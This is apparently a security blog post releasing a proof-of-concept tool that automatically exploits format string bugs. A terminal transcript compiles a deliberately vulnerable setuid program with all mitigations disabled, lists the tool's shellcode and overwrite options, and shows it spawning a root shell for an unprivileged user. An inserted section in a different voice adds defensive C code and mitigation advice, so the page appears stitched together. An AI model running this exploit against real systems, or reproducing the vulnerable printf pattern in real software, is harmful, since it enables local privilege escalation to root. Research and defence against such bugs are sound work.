Redspin Security Blog

Automatic Format String Exploitation

by The Shell Shakespeare on Nov.25, 2009, under Redspin Labs

Here at Redspin, we don’t often get a chance to fool around with binaries. Nevertheless, during an audit we encountered a program with a simple format string attack. Not content with the manual format string exploitation process, we decided to write our own tool to automate it. After much coding, we saw that it was good, and decided to share:

root@bt:~# wget http://www.redspin.com/blog/wp-files/Format%20String%20Auto%20Exploitation.tar.bz2
root@bt:~# tar jxvf Format\ String\ Auto\ Exploitation.tar.bz2
root@bt:~# cd Format\ String\ Auto\ Exploitation
root@bt:~/Format String Auto Exploitation# ls
auto_test.sh  format_exploit_automagic.py  Makefile  printf.c  README.txt
root@bt:~# cat printf.c
#include <stdio.h>
int main(int argc, char **argv){printf(argv[1]);}
root@bt:~/Format String Auto Exploitation# make
gcc -w -O0 -ggdb -std=c99 -c printf.c
gcc -static -D_FORTIFY_SOURCE=0 -fno-pie -Wno-format -Wno-format-security -fno-stack-protector -z norelro -z execstack  printf.o -o printf
root@bt:~/Format String Auto Exploitation# sudo chmod +s ./printf
root@bt:~/Format String Auto Exploitation# adduser dummy
Adding user `dummy' ...
Adding new group `dummy' (1000) ...
Adding new user `dummy' (1000) with group `dummy' ...
Creating home directory `/home/dummy' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for dummy
Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
Is the information correct? [Y/n] y
root@bt:~/Format String Auto Exploitation# su dummy
dummy@bt:/root/Format String Auto Exploitation$ id
uid=1000(dummy) gid=1000(dummy) groups=1000(dummy)
dummy@bt:/root/Format String Auto Exploitation$ ls -al ./printf
-rwsr-sr-x 1 root root 576267 2009-11-25 17:13 ./printf
dummy@bt:/root/Format String Auto Exploitation$ python format_exploit_automagic.py -h
Usage: format_exploit_automagic.py [options] binary
Attempt automatic format string exploitation on the provided binary.

Default action is to insert setreuid(geteuid(),geteuid()); execve('/bin/sh',0,0)
shellcode at the end of the format string, and overwrite the DTOR address of the
binary to return to it.

Options:
 -h, --help                            show this help message and exit
 -v, --verbose                         Increase verbosity (specify multiple times for more) default is 2
 -q, --quiet                           Decrease verbosity (specify multiple times for more)

 Overwrite options:
  Arguments to determine location to overwrite in binary

  -d, --dtor                           overwrite dtor address (True)
  -g function, --got=function          Overwrite GOT function (ie: exit)
  -c, --code                           Overwrite first code segment return address found on stack
  -a 0x12345678, --address=0x12345678  Custom overwrite address

 Exploit options:
  Arguments that control the how and where of our shellcode

  -s, --string                         Insert shellcode within format string (True)
  -S shellcode, --Shellcode=shellcode  Insert Custom shellcode in format string (ie: setuid(0); exec '/bin/sh')
  -E, --Environ                        Put shellcode into environment and use it
  -e name, --environ=name              Use address of given environment variable
  -b 90909090, --bytes=90909090        Find byte string on stack and point to it
  -r 0x12345678, --return=0x12345678   Custom shellcode address
  -o 123, --offset=123                 Custom stack offset to format string
dummy@bt:/root/Format String Auto Exploitation$ python format_exploit_automagic.py ./printf
# whoami
root
# 0wn3d!
(null): 0wn3d!: not found
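The printf.c in the transcript hands argv[1] to printf() as the format argument, so any conversion specifiers in the input are interpreted, and the Makefile strips every mitigation the toolchain would otherwise apply (-D_FORTIFY_SOURCE=0, -Wno-format-security, -fno-stack-protector, -z norelro, -z execstack, -fno-pie). The following is an added example, not code from the Redspin tool or the tarball: the same one-line program written so that user input can never act as a format string, plus a small check a defender can use to flag input that a printf-family function would have interpreted. The function names and the log message are my own.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Added example, not the page's printf.c: the vulnerable call is
 *     printf(argv[1]);
 * and the fix is to make the format a constant and pass the data as an
 * argument. Everything below is illustrative code with invented names. */

/* Returns true if s contains a '%' that a printf-family function would treat
 * as a conversion (anything other than the literal "%%"). Such input must
 * never reach printf() as the format argument; as data it is harmless. */
bool contains_format_directive(const char *s) {
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {          /* "%%" prints a literal percent sign */
            p++;
            continue;
        }
        return true;                /* "%x", "%n", "%s", a trailing "%" ... */
    }
    return false;
}

/* Safe rendering of untrusted input: the format string is a compile-time
 * constant, so "%n", "%x" etc. inside user_input are printed verbatim. */
int print_untrusted(FILE *out, const char *user_input) {
    return fprintf(out, "%s\n", user_input);
}

/* Checkable form of the same idea: render through a constant "%s" format
 * into a buffer and confirm the input came out byte-for-byte unchanged. */
bool renders_literally(const char *user_input) {
    char buf[256];
    int n = snprintf(buf, sizeof buf, "%s", user_input);
    return n >= 0 && (size_t)n < sizeof buf && strcmp(buf, user_input) == 0;
}

int main(int argc, char **argv) {
    if (argc < 2) {
        fputs("usage: safe_printf <string>\n", stderr);
        return 1;
    }
    /* The input is still echoed safely either way; a defender additionally
     * wants the suspicious case recorded, which is what this log line does. */
    if (contains_format_directive(argv[1]))
        fprintf(stderr, "warning: argument contains printf directives; printing it literally\n");
    print_untrusted(stdout, argv[1]);
    return 0;
}
```

Running this binary with the same "%x%x%n"-style argument just prints the argument back. The compile flags are the other half of the check: building the page's printf.c with a default modern gcc instead of the page's Makefile gives -Wformat-security a warning on printf(argv[1]), _FORTIFY_SOURCE=2 makes glibc abort when a "%n" directive appears in a writable format string, full RELRO (-z relro -z now) makes the GOT and destructor tables read-only so the tool's default overwrite target is no longer writable, and a non-executable stack plus PIE remove the fixed, executable addresses the help text relies on. A program that still exploits cleanly under those defaults is the finding to report; one that only falls over with every mitigation switched off is a weaker one.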

The tool and accompanying files are here: Format String Auto Exploitation.tar.bz2, or you can just get the Python script here: format_exploit_automagic.py.

Even though it is a POC, it should be easily modified to support other programs vulnerable to format string attacks, and it has been licensed under the GPLv3 for your hacking needs. I’m considering porting it to Ruby, adding 64-bit exploitation and merging it into the Metasploit tree, but figured I’d release it as-is to see if there’s still any interest in old-school binary exploitation. I’m also happy to discuss the techniques the tool uses, if anyone is interested.

Let me know if you have any issues/hacks/recommendations.
POC: What are you thankful for?
